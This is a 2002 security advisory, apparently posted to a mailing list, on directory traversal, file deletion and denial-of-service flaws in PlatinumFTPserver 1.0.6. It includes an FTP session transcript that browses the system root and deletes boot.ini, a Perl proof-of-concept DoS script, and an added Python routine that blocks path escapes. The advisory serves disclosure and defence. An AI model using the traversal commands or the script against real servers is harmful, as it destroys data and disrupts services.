Date: Mon, 30 Dec 2002 20:34:40 +0100
From: Dennis Rand <[email protected]>
To: "[email protected]" <[email protected]>
Subject: Multiple vulnerabilities found in PlatinumFTPserver V1.0.6
Best regards,
Dennis Rand
System/Security Manager
COWI A/S
A world of machines pushing packets to each other. Computers passing data
through various protocols without argument. A problem humanity still hasn't
surpassed. Networks breaking barriers of political hatred. Physical bodies
are no longer important nor needed. A new world of electronic entities...
Multiple vulnerabilities found in
PlatinumFTPserver V1.0.6
PlatinumFTPserver (C)2002 BYTE/400 LTD

Discovered by Dennis Rand - COWI A/S
------------------------------------------------------------------------
SUMMARY
PlatinumFTPserver simplifies management of all your Ftp clients with regards
to sending and receiving program and data files over an IP connection.
Working within a control screen, PlatinumFTPserver gives you total
control: you can create and manage users, user groups and root directories.
You can define what Ftp Commands the users or groups can access.
PlatinumFTPserver provides activity logs, client connection details, file
and megabyte graphical statistics by session and day, virtual folders and a
built in Web Browser. The server engine runs as an application on Windows 9x
and a service under NT/2K/XP.

PlatinumFTPserver can bind to one or all IP addresses within the PC. All
configuration data for the server including password and description fields
are encrypted using the powerful Blowfish cipher. Clients can request files
be zipped before transfer, execute scripts created with the VBscript editor
and also access the shell process.

A vulnerability in the product allows remote attackers to cause
the server to traverse into directories that reside outside the bounding
FTP root directory, delete files and perform a DoS attack on the server.
DETAILS
Vulnerable systems:
* PlatinumFTPServer version 1.0.6
  (also with the patch released 14. Dec. 2002 installed)
Immune systems:
* PlatinumFTPServer version 1.x.x
PlatinumFTP's failure to filter out "..\" sequences in command requests allows
remote users to break out of restricted directories and gain read access
to the system directory structure. It also makes it possible to delete files
and perform a DoS attack on the server.

The following transcript demonstrates a sample exploitation of the
vulnerabilities:
C:\>ftp 192.168.1.199
Connected to 192.168.1.199.
220-PlatinumFTPserver V1.0.6
220-PlatinumFTPserver (C)2002 BYTE/400 LTD
220-
220 Enter login details
User (192.168.1.199:(none)): anonymous
331 Password required for anonymous.
Password:
230-Send comments to [email protected]
230-Date 12/30/02, Time 1:44:34 PM.
230 Storage available 1,954,179,072 Bytes.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> cd ..
550 Access denied
ftp> dir ..\..\..\..\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x 1 User Group 279 Dec 23 12:16 boot.ini
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler til Windows Update
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
-rwxr-xr-x 1 User Group 134217728 Dec 30 13:43 pagefile.sys
drwxr-xr-x 1 User Group 0 Dec 30 13:23 Program Files
drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
drwxr-xr-x 1 User Group 0 Dec 30 13:08 TEMP
drwxr-xr-x 1 User Group 0 Dec 30 13:55 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,00Seconds 1181000,00Kbytes/sec.
ftp> delete ..\..\..\..\boot.ini
250 delete command successful.
ftp> dir ..\..\..\..\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler til Windows Update
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
-rwxr-xr-x 1 User Group 134217728 Dec 30 15:24 pagefile.sys
drwxr-xr-x 1 User Group 0 Dec 30 15:19 Program Files
drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
drwxr-xr-x 1 User Group 0 Dec 24 00:08 TEMP
drwxr-xr-x 1 User Group 0 Dec 30 16:30 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,12Seconds 9,76Kbytes/sec.
ftp> cd @/..@/..
ftp> bye
221 Goodbye.
Analysis:

1: DIR Command vulnerability
Any remote user with legitimate or anonymous access to an affected
PlatinumFTP server can exploit the vulnerability and freely browse the target
system's directory structure. Such information could prove useful in
subsequent attacks, and could help an attacker conduct social engineering
attacks.

2: DELETE Command vulnerability
With this command an attacker can destroy data on the server.
As the transcript above shows, it is fairly simple to do so.

3: CD Command vulnerability
The last command, "cd @/..@/..", causes a DoS condition on the server, in
which the server uses 99% of the CPU time.
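
Added example, not part of the original advisory and not the vendor's code:
the kind of server-side check that keeps DIR, DELETE and CD arguments inside
the FTP root, written in Python and run against the inputs from the transcript.
The root C:\ftproot, the function names and the 250 success code are
assumptions made for illustration.

```python
import ntpath
import re

class PathEscape(ValueError):
    """Client path would leave the FTP root or is ambiguous on Windows."""

_SEPARATORS = re.compile(r"[\\/]+")   # Windows accepts both slash styles

def resolve_virtual(cwd, arg):
    """Return the normalized virtual path ("/a/b") that `arg` names when
    issued from virtual directory `cwd`; raise PathEscape on any climb
    above "/"."""
    if "\x00" in arg or ":" in arg:
        raise PathEscape("NUL, drive letter or stream syntax in path")
    absolute = arg[:1] in ("/", "\\")
    stack = [] if absolute else [p for p in _SEPARATORS.split(cwd) if p]
    for part in _SEPARATORS.split(arg):
        if part in ("", "."):
            continue
        if part == "..":
            if not stack:
                raise PathEscape("'..' above FTP root")
            stack.pop()
        elif part != part.rstrip(". "):
            # Win32 trims trailing dots/spaces, so ".. " could act as "..".
            raise PathEscape("component with trailing dot or space")
        else:
            stack.append(part)   # "..@" is an ordinary name, not a parent
    return "/" + "/".join(stack)

def to_real(root, vpath):
    """Map a virtual path from resolve_virtual() onto the on-disk root and
    re-check containment after Windows-style normalization."""
    root = ntpath.normpath(root)
    real = ntpath.normpath(ntpath.join(root, *vpath.strip("/").split("/")))
    prefix = root.rstrip("\\") + "\\"
    if real != root and not real.lower().startswith(prefix.lower()):
        raise PathEscape("resolved outside FTP root")
    return real

def handle(cwd, arg, root=r"C:\ftproot"):
    """Outcome for a path argument: (550, None) when refused, otherwise
    (250, real path); 250 stands in for the command's success reply."""
    try:
        return 250, to_real(root, resolve_virtual(cwd, arg))
    except PathEscape:
        return 550, None
```

With this check, "dir ..\..\..\..\" and "delete ..\..\..\..\boot.ini" get the
same 550 reply that "cd .." already receives in the transcript, and
"@/..@/.." resolves in a single pass to the in-root name "/@".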
Exploit code:
------------------------------------- CUT HERE -----------------------------------------
#!/usr/bin/perl
#
# PlatinumFTPserver V1.0.6 DoS attack
# http://www.PlatinumFTP.com
# Dennis Rand - [email protected]
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
#
#
use Net::FTP;

$target = shift() || die "usage: target ip";
my $user = "anonymous";
my $pass = "crash\@burn.com";
system('cls');
print "PlatinumFTPserver V1.0.6 DoS attack\n";
print "Trying to connect to target system at: $target...\n";
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect: $!";
$ftp->login($user, $pass) || die "could not login: $!";
$ftp->cwd("/");
print "Trying to crash the FTP service...\n";
$ftp->cwd("cd @/..@/..");
$ftp->quit;
------------------------------------- CUT HERE -----------------------------------------
Detection:
PlatinumFTPServer version 1.0.6 is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above
transcript.

Vendor response:
PlatinumFTPServer version 1.x.x fixes this issue. The latest version is
available from http://www.platinumftp.com/platinumftpserver.php
Disclosure timeline:
12/30/2002 Found the Vulnerability.
12/30/2002 Author notified ([email protected])
xx/xx/2002 Responses received from [email protected]
xx/xx/2002 Public Disclosure.
ADDITIONAL INFORMATION
The vulnerability was discovered by <mailto:[email protected]> Dennis Rand